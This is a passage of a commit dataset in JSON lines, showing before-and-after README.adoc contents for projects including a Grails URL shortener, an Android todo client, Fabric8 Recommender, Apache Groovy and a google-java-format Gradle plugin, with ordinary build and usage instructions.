http:\/\/grails.org\/plugin\/sequence-generator[sequence-generator] plugin to generate sequence numbers\nfor short urls. Version 1.1+ of `sequence-generator` is compatible with version 0.2+ of `url-shortener`.\nJust add the `sequence-generator` plugin to your BuildConfig.groovy and you are ready to go.\n\nYou don't have to create a custom generator or configure a sequenceGenerator bean (section above),\nit done by the `sequence-generator` plugin.\n\n\n== Usage\n\nThe plugin provides a service `urlShortenerService` that you can inject into your grails artefacts with the following\npublic methods:\n\n* `shortUrl(String targetUrl)`: Returns a short url for the target url passed as param. If the url has already been\nshortened, the same short url is returned. Be careful because this method only returns the shortened characters for\nthe target url but not the url with the configured short domain.\n* `shortUrlFullDomain(String targetUrl)`: Returns the short url with the full domain.\n* `getTargetUrl(String shortUrl)`: Returns the target url (original url) from the short url passed as param.\nThe method also increase a counter with the number of times this url has been hit. If the short url does not exist\nthe method return null.\n\nExamples:\n\n[source, groovy]\n----\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert shortUrl.length() == 5\n\nString shortUrlWithDomain = urlShortenerService.shortUrlFullDomain(\"http:\/\/kaleidos.net\")\nassert shortUrlWithDomain.length() > 5\nassert shortUrlWithDomain.contains(\"http:\/\/\") == true\n\nString shortUrl = urlShortenerService.shortUrl(\"http:\/\/kaleidos.net\")\nassert urlShortenerService.getTargetUrl(shortUrl) == \"http:\/\/kaleidos.net\"\n----\n\nThe plugin also provides a controller that can be used to redirect to the target url.\nIt is available here\nhttps:\/\/github.com\/lmivan\/grails-url-shortener\/blob\/master\/grails-app\/controllers\/net\/kaleidos\/shortener\/ShortenerController.groovy[ShortenerController]\nor you can implement your own custom controller.\n\n=== Tag Library\n\nThe plugin provides two GSP tags that generate short urls, `link` and `createLink`. They work as the standard Grails `link` and `createLink` but generates short urls.\n\n[source, javascript]\n----\nfunction copyShortLinkToClipboard() {\n var url = \"${shorter.createLink(controller: 'person', action: 'show', id: person.id, absolute: true)}\";\n window.prompt(\"${message(code: 'copy.to.clipboard.label', 'Copy to clipboard: Ctrl+C, Enter')}\", url);\n}\n----\n\n== Author\n\nYou can send any questions to:\n\nIv\u00e1n L\u00f3pez: lopez.ivan@gmail.com (https:\/\/twitter.com\/ilopmar[@ilopmar])\n\nCollaborations are appreciated :-)\n\n\n== Release Notes\n\n* 0.2.1 - 18\/Jan\/2015 - Fix regresion in 0.2 (See https:\/\/github.com\/lmivan\/grails-url-shortener\/issues\/6[#6])\n* 0.2 - 21\/Nov\/2014 - Added GSP tags `shorter:link` and `shorter:createLink`.\n* 0.1 - 17\/Oct\/2013 - Initial version of the plugin.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"12591cde3c14f174a8fad527b1ebcd150f503e1f","subject":"Update","message":"Update\n","repos":"IanDarwin\/TodoAndroid,IanDarwin\/TodoAndroid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= TodoAndroid\n\nThis will someday be the TodoMore Android client.\n\n== Unfinished Warning\n\nAs of today it certainly is not fully working - don't try to use it unless you can code the parts that are missing.\nThe next bit push is that the SyncAdapter starts but isn't fully coded yet, so don't run it against\na database of real TODOs.\n\nNext up in this area will be a delete feature; it's harder because you have to atomically commit in two\nplaces, and you can't.\n\n== Security Warning\n\nThis version caches your password, unencrypted, in the shared preferences.\nSomebody who finds your phone AND knows what they're doing could modify\nor corrupt your TODO listings.\n\nPlease fix this and send a pull request!\n","old_contents":"= TodoAndroid\n\nThis will someday be the TodoMore Android client.\nAs of today it certainly is not fully working - don't try to use it unless you can recode the parts that are missing.\n\n== Security Warning\n\nThis version caches your password, unencrypted, in the shared preferences.\nSomebody who finds your phone AND knows what they're doing could modify\nor corrupt your TODO listings.\n\nPlease fix this and send a pull request!\n","returncode":0,"stderr":"","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"ea6e82514dea770205ad87353581110eaf298308","subject":"fix(readme): change readme to trigger a release","message":"fix(readme): change readme to trigger a release\n","repos":"arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender,arunkumars08\/fabric8-recommender","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Fabric8 Recommender\n\nimage:https:\/\/img.shields.io\/badge\/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic%20release-b4d455.svg[Semantic Release, link=\"https:\/\/github.com\/semantic-release\/semantic-release\"]\n\n**Fabric8 Recommender is a stack analysis feature.**\n\n== Running the app\n\n=== Set NODE_ENV\nIf you're just trying to test the application, please use inmemory mode which\nwill load the app with mock data for you. If you, however, want to contribute\nto the codebase, unset it back or to \"development\" (default) mode and rebuild.\n\n\n[source,shell]\n```\n$ export NODE_ENV=inmemory # <1>\n$ export NODE_ENV=development # <2>\n$ export NODE_ENV=production # <3>\n\n<1> In-memory mode for trying-out the app\n<2> Development mode for contributing to the source\n<2> Production mode for deploying the application\n```\n\nOnce you're done setting the environment, you can proceed with the next step(s)\n\nNOTE: If you're directly trying to run the app in dev mode, you can skip this\nstep, as *`NODE_ENV`* is treated as `\"development\"` by default.\n\n=== First run\n\nIf you're trying to run the app for the first time:\n\n $ npm install\n\nThen, start the app with:\n\n $ npm start\n\n=== Fresh run\n\nIf you trying to refresh your installation, you need to run:\n\n $ npm run reinstall\n\nThen, start the app with:\n\n $ npm start\n\n=== Testcase run\n\nTo run the linter, unit tests, and functional test use:\n\n $ npm test\n\n== Other useful scripts\n\nThe *`package.json`* file's `scripts:` section lists _all the tasks_ we run.\n\nHere are some of the most useful\/frequently used scripts you may need to run:\n\n[cols=\"1,2,4\", options=\"header\"]\n|===\n|Scipt\n|Command\n|Description\n\n|Lint\n|`$ npm run lint`\n|Runs the TypeScript and Angular 2 linter\n\n|Validation\n|`$ npm run validate`\n|Validates the webpack build\n\n|Unit Tests\n|`$ npm run test:unit`\n|Runs the unit tests\n\n|Functional Tests\n|`$ npm run test:func`\n|Runs the functional tests\n\n|Continuous Tests\n|`$ npm run watch:test`\n|Looks for changes in source code and runs unit tests\n|===\n\n== Building the app\n\n=== Production build\n\nTo generate production build, set API URL and run build script as follows:\n\n----\n$ npm run build:prod\n----\n\nThe build output will be under `dist` directory.\n\n*To create a docker image,* run this command immediately after the production\nbuild completion:\n\n=== Library Build\n\n==== For production:\n\nTo build the fabric8-stack-analysis-ui as an npm library, use:\n\n----\n$ npm run build\n----\n\nThe created library will be placed in `dist`.\n\nIMPORTANT: *You shouldn't ever publish the build manually,* instead you should\nlet the CD pipeline do a semantic release.\n\n==== For development:\n\nTo build fabric8-stack-analysis-ui as an npm library and embed it into a webapp such as\nfabric8-ui, you should:\n\nStep 1: Run `npm run watch:library` in the source directory::\nThis will build fabric8-stack-analysis-ui as a library and then set up a watch task to\nrebuild any ts, html and scss files you change.\n\nStep 2: Run `npm link <path to fabric8-stack-analysis-ui>\/dist-watch`::\nIn the webapp into which you are embedding. This will create a symlink from\n`node_modules\/fabric8-stack-analysis-ui` to the `dist-watch` directory and install that\nsymlinked node module into your webapp.\n\nStep 3: Run your webapp in development mode::\nMake sure you have a watch on `node_modules\/fabric8-stack-analysis-ui` enabled. You will\nhave access to both JS and SASS sourcemaps if your webapp is properly setup.\n\nNOTE: `fabric8-ui` is setup to do reloading and sourcemaps automatically when you\nrun `npm start`.\n\n**To hit stack analysis api in standalone mode**\nPut a token in the environment variable with key as 'STACK_API_TOKEN'.\n\n== CSS and SASS\n\nfabric8-stack-analysis-ui uses SASS for it's stylesheets. It also uses the Angular emulation\nof the shadow dom, so you will normally want to place your styles in the\n`.component.scss` file next to the html and the typescript.\n\nWe use mixins to avoid polluting components with uncessary style classes, and to avoid\nan explosion of shared files. \n\nThe `src\/assets\/stylesheets\/` directory includes a `shared` directory. These are\nshared global styles that we will refactor out in to a shared library at some point.\nOnly update these styles if you are making a truly global style, and are going to\nsynchronise your changes across all the various UI projects. \n\n== Contributing to the app\n\nThe development guide is part of the link:.\/CONTRIBUTING.adoc[contributors'\ninstructions]. Please check it out in order to contribute to this project. \n","old_contents":"= Fabric8 Recommender\n\nimage:https:\/\/img.shields.io\/badge\/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic%20release-b4d455.svg[Semantic Release, link=\"https:\/\/github.com\/semantic-release\/semantic-release\"]\n\n**Fabric8 Recommender is a stack analysis feature.**\n\n== Running the app\n\n=== Set NODE_ENV\nIf you're just trying to test the application, please use inmemory mode which\nwill load the app with mock data for you. If you, however, want to contribute\nto the codebase, unset it back or to \"development\" (default) mode and rebuild.\n\n\n[source,shell]\n```\n$ export NODE_ENV=inmemory # <1>\n$ export NODE_ENV=development # <2>\n$ export NODE_ENV=production # <3>\n\n<1> In-memory mode for trying-out the app\n<2> Development mode for contributing to the source\n<2> Production mode for deploying the application\n```\n\nOnce you're done setting the environment, you can proceed with the next step(s)\n\nNOTE: If you're directly trying to run the app in dev mode, you can skip this\nstep, as *`NODE_ENV`* is treated as `\"development\"` by default.\n\n=== First run\n\nIf you're trying to run the app for the first time:\n\n $ npm install\n\nThen, start the app with:\n\n $ npm start\n\n=== Fresh run\n\nIf you trying to refresh your installation, you need to run:\n\n $ npm run reinstall\n\nThen, start the app with:\n\n $ npm start\n\n=== Testcase run\n\nTo run the linter, unit tests, and functional test use:\n\n $ npm test\n\n== Other useful scripts\n\nThe *`package.json`* file's `scripts:` section lists _all the tasks_ we run.\n\nHere are some of the most useful\/frequently used scripts you may need to run:\n\n[cols=\"1,2,4\", options=\"header\"]\n|===\n|Scipt\n|Command\n|Description\n\n|Lint\n|`$ npm run lint`\n|Runs the TypeScript and Angular 2 linter\n\n|Validation\n|`$ npm run validate`\n|Validates the webpack build\n\n|Unit Tests\n|`$ npm run test:unit`\n|Runs the unit tests\n\n|Functional Tests\n|`$ npm run test:func`\n|Runs the functional tests\n\n|Continuous Tests\n|`$ npm run watch:test`\n|Looks for changes in source code and runs unit tests\n|===\n\n== Building the app\n\n=== Production build\n\nTo generate production build, set API URL and run build script as follows:\n\n----\n$ npm run build:prod\n----\n\nThe build output will be under `dist` directory.\n\n*To create a docker image,* run this command immediately after the production\nbuild completion:\n\n=== Library Build\n\n==== For production:\n\nTo build the fabric8-stack-analysis-ui as an npm library, use:\n\n----\n$ npm run build\n----\n\nThe created library will be placed in `dist`.\n\nIMPORTANT: *You shouldn't ever publish the build manually,* instead you should\nlet the CD pipeline do a semantic release.\n\n==== For development:\n\nTo build fabric8-stack-analysis-ui as an npm library and embed it into a webapp such as\nfabric8-ui, you should:\n\nStep 1: Run `npm run watch:library` in the source directory::\nThis will build fabric8-stack-analysis-ui as a library and then set up a watch task to\nrebuild any ts, html and scss files you change.\n\nStep 2: Run `npm link <path to fabric8-stack-analysis-ui>\/dist-watch`::\nIn the webapp into which you are embedding. This will create a symlink from\n`node_modules\/fabric8-stack-analysis-ui` to the `dist-watch` directory and install that\nsymlinked node module into your webapp.\n\nStep 3: Run your webapp in development mode::\nMake sure you have a watch on `node_modules\/fabric8-stack-analysis-ui` enabled. You will\nhave access to both JS and SASS sourcemaps if your webapp is properly setup.\n\nNOTE: `fabric8-ui` is setup to do reloading and sourcemaps automatically when you\nrun `npm start`.\n\n**To hit stack analysis api in standalone mode**\nPut a token in the environment variable with key as 'STACK_API_TOKEN'\n\n== CSS and SASS\n\nfabric8-stack-analysis-ui uses SASS for it's stylesheets. It also uses the Angular emulation\nof the shadow dom, so you will normally want to place your styles in the\n`.component.scss` file next to the html and the typescript.\n\nWe use mixins to avoid polluting components with uncessary style classes, and to avoid\nan explosion of shared files. \n\nThe `src\/assets\/stylesheets\/` directory includes a `shared` directory. These are\nshared global styles that we will refactor out in to a shared library at some point.\nOnly update these styles if you are making a truly global style, and are going to\nsynchronise your changes across all the various UI projects. \n\n== Contributing to the app\n\nThe development guide is part of the link:.\/CONTRIBUTING.adoc[contributors'\ninstructions]. Please check it out in order to contribute to this project. \n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7fbff13ef3c1c52348aff998f8568e15cc81e172","subject":"Fix IDE integration instructions in README. (closes #26)","message":"Fix IDE integration instructions in README. (closes #26)\n\nThe README stated that you should run\n\n gradlew jarAll idea\n\nbefore loading the project into IntelliJ IDEA. It seems, though, that the `jarAll`\ntask breaks the IDE integration and you can't run tests. Running\n\n gradlew jar idea\n\nseems to work fine, so I've updated the README to reflect this.\n","repos":"shils\/incubator-groovy,sagarsane\/incubator-groovy,apache\/groovy,pickypg\/incubator-groovy,upadhyayap\/incubator-groovy,antoaravinth\/incubator-groovy,paulk-asert\/incubator-groovy,avafanasiev\/groovy,genqiang\/incubator-groovy,alien11689\/incubator-groovy,pledbrook\/incubator-groovy,adjohnson916\/incubator-groovy,samanalysis\/incubator-groovy,nkhuyu\/incubator-groovy,dpolivaev\/groovy,jwagenleitner\/groovy,bsideup\/groovy-core,jwagenleitner\/groovy,armsargis\/groovy,aaronzirbes\/incubator-groovy,paplorinc\/incubator-groovy,nobeans\/incubator-groovy,yukangguo\/incubator-groovy,rabbitcount\/incubator-groovy,ChanJLee\/incubator-groovy,nkhuyu\/incubator-groovy,sagarsane\/incubator-groovy,aim-for-better\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/groovy,aim-for-better\/incubator-groovy,dpolivaev\/groovy,bsideup\/incubator-groovy,ChanJLee\/incubator-groovy,upadhyayap\/incubator-groovy,bsideup\/incubator-groovy,EPadronU\/incubator-groovy,taoguan\/incubator-groovy,fpavageau\/groovy,ebourg\/incubator-groovy,paplorinc\/incubator-groovy,tkruse\/incubator-groovy,upadhyayap\/incubator-groovy,taoguan\/incubator-groovy,aim-for-better\/incubator-groovy,aaronzirbes\/incubator-groovy,pledbrook\/incubator-groovy,paplorinc\/incubator-groovy,shils\/groovy,kidaa\/incubator-groovy,gillius\/incubator-groovy,jwagenleitner\/incubator-groovy,taoguan\/incubator-groovy,russel\/groovy,apache\/groovy,bsideup\/groovy-core,samanalysis\/incubator-groovy,dpolivaev\/groovy,adjohnson916\/incubator-groovy,alien11689\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,genqiang\/incubator-groovy,genqiang\/incubator-groovy,jwagenleitner\/incubator-groovy,graemerocher\/incubator-groovy,armsargis\/groovy,antoaravinth\/incubator-groovy,fpavageau\/groovy,apache\/groovy,pickypg\/incubator-groovy,antoaravinth\/incubator-groovy,gillius\/incubator-groovy,eginez\/incubator-groovy,graemerocher\/incubator-groovy,EPadronU\/incubator-groovy,shils\/incubator-groovy,kenzanmedia\/incubator-groovy,samanalysis\/incubator-groovy,samanalysis\/incubator-groovy,kenzanmedia\/incubator-groovy,nobeans\/incubator-groovy,ChanJLee\/incubator-groovy,guangying945\/incubator-groovy,russel\/groovy,i55ac\/incubator-groovy,rabbitcount\/incubator-groovy,guangying945\/incubator-groovy,shils\/groovy,paplorinc\/incubator-groovy,traneHead\/groovy-core,taoguan\/incubator-groovy,rabbitcount\/incubator-groovy,pledbrook\/incubator-groovy,pickypg\/incubator-groovy,sagarsane\/incubator-groovy,russel\/incubator-groovy,apache\/incubator-groovy,tkruse\/incubator-groovy,graemerocher\/incubator-groovy,i55ac\/incubator-groovy,bsideup\/groovy-core,apache\/incubator-groovy,apache\/incubator-groovy,shils\/incubator-groovy,paulk-asert\/groovy,sagarsane\/incubator-groovy,tkruse\/incubator-groovy,pickypg\/incubator-groovy,adjohnson916\/incubator-groovy,alien11689\/incubator-groovy,paulk-asert\/groovy,russel\/incubator-groovy,russel\/groovy,russel\/groovy,dpolivaev\/groovy,avafanasiev\/groovy,jwagenleitner\/groovy,antoaravinth\/incubator-groovy,tkruse\/incubator-groovy,pledbrook\/incubator-groovy,ebourg\/incubator-groovy,graemerocher\/incubator-groovy,alien11689\/incubator-groovy,ebourg\/incubator-groovy,kidaa\/incubator-groovy,gillius\/incubator-groovy,nobeans\/incubator-groovy,armsargis\/groovy,shils\/groovy,aim-for-better\/incubator-groovy,armsargis\/groovy,bsideup\/incubator-groovy,yukangguo\/incubator-groovy,i55ac\/incubator-groovy,paulk-asert\/incubator-groovy,fpavageau\/groovy,i55ac\/incubator-groovy,kenzanmedia\/incubator-groovy,paulk-asert\/incubator-groovy,russel\/incubator-groovy,eginez\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,yukangguo\/incubator-groovy,apache\/groovy,ChanJLee\/incubator-groovy,paulk-asert\/incubator-groovy,avafanasiev\/groovy,kidaa\/incubator-groovy,paulk-asert\/groovy,kidaa\/incubator-groovy,fpavageau\/groovy,bsideup\/groovy-core,rabbitcount\/incubator-groovy,shils\/incubator-groovy,gillius\/incubator-groovy,paulk-asert\/groovy,paulk-asert\/incubator-groovy,russel\/incubator-groovy,shils\/groovy,bsideup\/incubator-groovy,adjohnson916\/incubator-groovy,traneHead\/groovy-core,eginez\/incubator-groovy,nkhuyu\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,guangying945\/incubator-groovy,nobeans\/incubator-groovy,yukangguo\/incubator-groovy,guangying945\/incubator-groovy,avafanasiev\/groovy,kenzanmedia\/incubator-groovy,nkhuyu\/incubator-groovy,ebourg\/incubator-groovy,genqiang\/incubator-groovy,aaronzirbes\/incubator-groovy,jwagenleitner\/incubator-groovy,upadhyayap\/incubator-groovy","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Groovy\nThe Groovy development team\n:revdate: 24-02-2014\n:build-icon: http:\/\/ci.groovy-lang.org:8111\/app\/rest\/builds\/buildType:(id:Groovy_Jdk7Build)\/statusIcon\n:noheader:\n:groovy-www: http:\/\/groovy-lang.org\/\n:groovy-ci: http:\/\/ci.groovy-lang.org?guest=1\n:jdk: http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\n:bintray-latest-version-image: https:\/\/api.bintray.com\/packages\/groovy\/maven\/groovy\/images\/download.png\n:bintray-latest-version-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/_latestVersion\n:bintray-watch-image: https:\/\/www.bintray.com\/docs\/images\/bintray_badge_color.png\n:bintray-watch-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/view?source=watch\n\n[.left.text-left]\nimage::http:\/\/groovy.codehaus.org\/img\/groovy-logo.png[]\n{groovy-www}[Groovy] is a powerful, optionally typed and dynamic language, with static-typing and static compilation capabilities, for the Java platform aimed at multiplying developers\u2019 productivity thanks to a concise, familiar and easy to learn syntax.\n\nIt integrates smoothly with any Java program, and immediately delivers to your application powerful features, including scripting capabilities, Domain-Specific Language authoring, runtime and compile-time meta-programming and functional programming. \n\n== Downloading\n\nLatest Groovy version is available on Bintray image:{bintray-latest-version-image}[Bintray latest version, link={bintray-latest-version-link}]\n\nBinary distribution links are on the package page.\n\nMaven, Gradle and Ivy dependency declaration snippets are available on specific files of a particular module.\n\nimage:{bintray-watch-image}[Get automatic notifications about new \"groovy\" versions link={bintray-watch-link}]\n\n== Obtaining the Source\n\nYou don't need the source code to use Groovy but if you wish to explore its inner workings or build it for yourself there are two ways to obtain the source files.\n\n=== Checking out from Version Control\n\nApache Groovy uses Git. The official Git repository is at:\n\n http:\/\/git-wip-us.apache.org\/repos\/asf\/incubator-groovy.git\n\nAnd a mirror is hosted on Github:\n\n https:\/\/github.com\/apache\/incubator-groovy\n\nThe Github mirror is read-only and provides convenience to users and developers to explore the code and for the community to accept contributions via Github pull requests.\n\nSimply `git clone` the repo (or the repo you forked via the github website) and you will have the complete source.\n\n=== Unpacking the src distribution\n\nAlternatively, you can download the source distribution and unpack it.\n\nIf obtaining the source from this distribution and you intend to build from source,\nyou also need to https:\/\/gradle.org\/downloads\/[download] and install http:\/\/gradle.org\/[Gradle] and execute one bootstrap step.\nAt the top directory of your unpacked source, you need to run the command:\n\n gradle\n\nThis sets up the Gradle wrapper and from then on you just need the `gradlew` command instead of `gradle`.\n\n== Building from Source\n\nBuild is image:{build-icon}[build status, link={groovy-ci}].\n\nTo build you will need:\n\n* {jdk}[JDK 1.7+]\n\nTo build everything using Gradle:\n\n gradlew clean dist\n\nNote: The gradlew command automatically downloads the correct Gradle version if needed, you do not need to download it first.\n\nThis will generate a distribution similar to the zip you can download on the Groovy download page.\n\nTo build everything and launch unit tests, use:\n\n gradlew test\n\nIf you want to launch one unit test, use this. <TestClassName> is like `groovy.GroovyMethodsTest`.\n\n gradlew :test --tests <TestClassName>\n\nTo build from IntelliJ IDEA:\n\n gradlew jar idea\n\nThen open the generated project in IDEA.\n\nTo build from Eclipse:\n\n gradlew jar eclipse\n\nThen open the generated project and the generated subprojects in Eclipse. But be aware that Eclipse tends to be more limited in its ability to reproduce a Gradle build structure. The generated project files may contain a circular dependency which may or may not prevent Eclipse from using them. It depends on the Eclipse version, if this is an issue or not.\n\nTo build the documentation (Groovy Language Documentation):\n\n gradlew assembleAsciidoc\n\nAll code samples of the documentation guide are pulled from actual test cases. To run a single documentation test case, take for example `src\/spec\/test\/semantics\/PowerAssertTest.groovy`\n\n gradlew testSinglePowerAssertTest\n\n(Note the omission of package name: class is `semantics.PowerAssertTest` but only `PowerAssertTest` is added to `testSingle`.)\n\n== InvokeDynamic support\n\nThe Groovy build supports the new Java 7 JVM instruction `invokedynamic`. If you want to build Groovy with invokedynamic, you can use the project property `indy`:\n\n gradlew -Pindy=true clean test\n\nPlease note that the following Gradle tasks generate both indy and non indy variants of the jars, so you don't need to use the system property:\n\n* dist\n* install\n* uploadArchives\n\n== Continuous Integration Server\n\nThe official CI server runs {groovy-ci}[here] (login as user guest and leave the password blank) and is sponsored by http:\/\/www.jetbrains.com[JetBrains].\n\n== License\n\nGroovy is licensed under the terms of the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache License, Version 2.0]\n","old_contents":"= Groovy\nThe Groovy development team\n:revdate: 24-02-2014\n:build-icon: http:\/\/ci.groovy-lang.org:8111\/app\/rest\/builds\/buildType:(id:Groovy_Jdk7Build)\/statusIcon\n:noheader:\n:groovy-www: http:\/\/groovy-lang.org\/\n:groovy-ci: http:\/\/ci.groovy-lang.org?guest=1\n:jdk: http:\/\/www.oracle.com\/technetwork\/java\/javase\/downloads\n:bintray-latest-version-image: https:\/\/api.bintray.com\/packages\/groovy\/maven\/groovy\/images\/download.png\n:bintray-latest-version-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/_latestVersion\n:bintray-watch-image: https:\/\/www.bintray.com\/docs\/images\/bintray_badge_color.png\n:bintray-watch-link: https:\/\/bintray.com\/groovy\/maven\/groovy\/view?source=watch\n\n[.left.text-left]\nimage::http:\/\/groovy.codehaus.org\/img\/groovy-logo.png[]\n{groovy-www}[Groovy] is a powerful, optionally typed and dynamic language, with static-typing and static compilation capabilities, for the Java platform aimed at multiplying developers\u2019 productivity thanks to a concise, familiar and easy to learn syntax.\n\nIt integrates smoothly with any Java program, and immediately delivers to your application powerful features, including scripting capabilities, Domain-Specific Language authoring, runtime and compile-time meta-programming and functional programming. \n\n== Downloading\n\nLatest Groovy version is available on Bintray image:{bintray-latest-version-image}[Bintray latest version, link={bintray-latest-version-link}]\n\nBinary distribution links are on the package page.\n\nMaven, Gradle and Ivy dependency declaration snippets are available on specific files of a particular module.\n\nimage:{bintray-watch-image}[Get automatic notifications about new \"groovy\" versions link={bintray-watch-link}]\n\n== Obtaining the Source\n\nYou don't need the source code to use Groovy but if you wish to explore its inner workings or build it for yourself there are two ways to obtain the source files.\n\n=== Checking out from Version Control\n\nApache Groovy uses Git. The official Git repository is at:\n\n http:\/\/git-wip-us.apache.org\/repos\/asf\/incubator-groovy.git\n\nAnd a mirror is hosted on Github:\n\n https:\/\/github.com\/apache\/incubator-groovy\n\nThe Github mirror is read-only and provides convenience to users and developers to explore the code and for the community to accept contributions via Github pull requests.\n\nSimply `git clone` the repo (or the repo you forked via the github website) and you will have the complete source.\n\n=== Unpacking the src distribution\n\nAlternatively, you can download the source distribution and unpack it.\n\nIf obtaining the source from this distribution and you intend to build from source,\nyou also need to https:\/\/gradle.org\/downloads\/[download] and install http:\/\/gradle.org\/[Gradle] and execute one bootstrap step.\nAt the top directory of your unpacked source, you need to run the command:\n\n gradle\n\nThis sets up the Gradle wrapper and from then on you just need the `gradlew` command instead of `gradle`.\n\n== Building from Source\n\nBuild is image:{build-icon}[build status, link={groovy-ci}].\n\nTo build you will need:\n\n* {jdk}[JDK 1.7+]\n\nTo build everything using Gradle:\n\n gradlew clean dist\n\nNote: The gradlew command automatically downloads the correct Gradle version if needed, you do not need to download it first.\n\nThis will generate a distribution similar to the zip you can download on the Groovy download page.\n\nTo build everything and launch unit tests, use:\n\n gradlew test\n\nIf you want to launch one unit test, use this. <TestClassName> is like `groovy.GroovyMethodsTest`.\n\n gradlew :test --tests <TestClassName>\n\nTo build from IntelliJ IDEA:\n\n gradlew jarAll idea\n\nThen open the generated project in IDEA.\n\nTo build from Eclipse:\n\n gradlew jarAll eclipse\n\nThen open the generated project and the generated subprojects in Eclipse. But be aware that Eclipse tends to be more limited in its ability to reproduce a Gradle build structure. The generated project files may contain a circular dependency which may or may not prevent Eclipse from using them. It depends on the Eclipse version, if this is an issue or not.\n\nTo build the documentation (Groovy Language Documentation):\n\n gradlew assembleAsciidoc\n\nAll code samples of the documentation guide are pulled from actual test cases. To run a single documentation test case, take for example `src\/spec\/test\/semantics\/PowerAssertTest.groovy`\n\n gradlew testSinglePowerAssertTest\n\n(Note the omission of package name: class is `semantics.PowerAssertTest` but only `PowerAssertTest` is added to `testSingle`.)\n\n== InvokeDynamic support\n\nThe Groovy build supports the new Java 7 JVM instruction `invokedynamic`. If you want to build Groovy with invokedynamic, you can use the project property `indy`:\n\n gradlew -Pindy=true clean test\n\nPlease note that the following Gradle tasks generate both indy and non indy variants of the jars, so you don't need to use the system property:\n\n* dist\n* install\n* uploadArchives\n\n== Continuous Integration Server\n\nThe official CI server runs {groovy-ci}[here] (login as user guest and leave the password blank) and is sponsored by http:\/\/www.jetbrains.com[JetBrains].\n\n== License\n\nGroovy is licensed under the terms of the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache License, Version 2.0]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f441357d445ce94dcf88161d4b1465865370d98f","subject":"Update README for v0.3","message":"Update README for v0.3","repos":"sherter\/google-java-format-gradle-plugin,sherter\/google-java-format-gradle-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= google-java-format-gradle-plugin\n:release-version: 0.3\n:default-google-java-format-version: 1.0\n:snapshot-version: 0.4-SNAPSHOT\n\n\nA https:\/\/github.com\/gradle\/gradle[Gradle] plugin that utilizes\nhttps:\/\/github.com\/google\/google-java-format[google-java-format] to\nformat the Java source files in your Gradle project.\n\nimage:https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin.svg?branch=master[\"Build\nStatus\",\nlink=\"https:\/\/travis-ci.org\/sherter\/google-java-format-gradle-plugin\"]\n\n== Quick Start\n* Apply the plugin in your build script (follow https:\/\/plugins.gradle.org\/plugin\/com.github.sherter.google-java-format[these instructions]\nfor Gradle versions below `2.1`)\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\nplugins {\n id 'com.github.sherter.google-java-format' version '{release-version}'\n}\n----\n+\n\n* Make sure you have defined a repository that contains version `{default-google-java-format-version}` of `google-java-format`\n+\n[source,groovy]\n----\nrepositories {\n jcenter() \/\/ or mavenCentral()\n}\n----\n\n* Execute the task `googleJavaFormat` to format all `*.java` files in the project\n+\n[source,shell]\n----\n$ .\/gradlew goJF\n----\n+\n* Execute the task `verifyGoogleJavaFormat` to verify that all `*.java` files are formatted properly\n+\n[source,shell]\n----\n$ .\/gradlew verGJF\n----\n\n== Extended Usage\n* The plugin adds the extension `googleJavaFormat` to your project. Adjust the variable `toolVersion` to use a specific version of `google-java-format`. You can even define `SNAPSHOT` versions, but make sure that you have added a repository to the project that contains this version (e.g. `mavenLocal()`). For plugin version `{release-version}` this value defaults to `{default-google-java-format-version}`. On every new release the default value will be updated to the latest version of `google-java-format`.\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ngoogleJavaFormat {\n toolVersion '1.1-SNAPSHOT'\n}\n----\n\n* Choose betweeen `'GOOGLE'` (default) and `'AOSP'` style by setting the style option (not supported in conjunction with `toolVersion` `v0.1-alpha`):\n+\n[source,groovy]\n----\ngoogleJavaFormat {\n options style: 'AOSP'\n}\n----\n\n* The predefined tasks `googleJavaFormat` and `verifyGoogleJavaFormat` by default process all `*.java` files found in the project or any subproject (except for files in a `buildDir`). They are of type `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/SourceTask.html[SourceTask]` and can be configured accordingly. For example, if you want to exclude specific files from a predefined task you can use https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[Ant-style exclude patterns].\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ntasks.googleJavaFormat {\n exclude '**\/*Template.java'\n exclude 'src\/test\/template_*'\n}\n----\n+\nYou can also overwrite the default inputs and use your own rules (see `https:\/\/docs.gradle.org\/current\/userguide\/working_with_files.html[Working With Files]`)\n+\n[source,groovy]\n[subs=\"attributes\"]\n----\ntasks.verifyGoogleJavaFormat {\n setSource fileTree('subprojects')\n include '**\/*.java'\n}\n----\n\n* Define your own format or verification tasks, if you need more than the predefined ones. The task type `VerifyGoogleJavaFormat` also implements the interface `https:\/\/docs.gradle.org\/2.0\/javadoc\/org\/gradle\/api\/tasks\/VerificationTask.html[VerificationTask]`.\n+\n[source,groovy]\n----\nimport com.github.sherter.googlejavaformatgradleplugin.GoogleJavaFormat\nimport com.github.sherter.googlejavaformatgradleplugin.VerifyGoogleJavaFormat\n\ntask format(type: GoogleJavaFormat) {\n 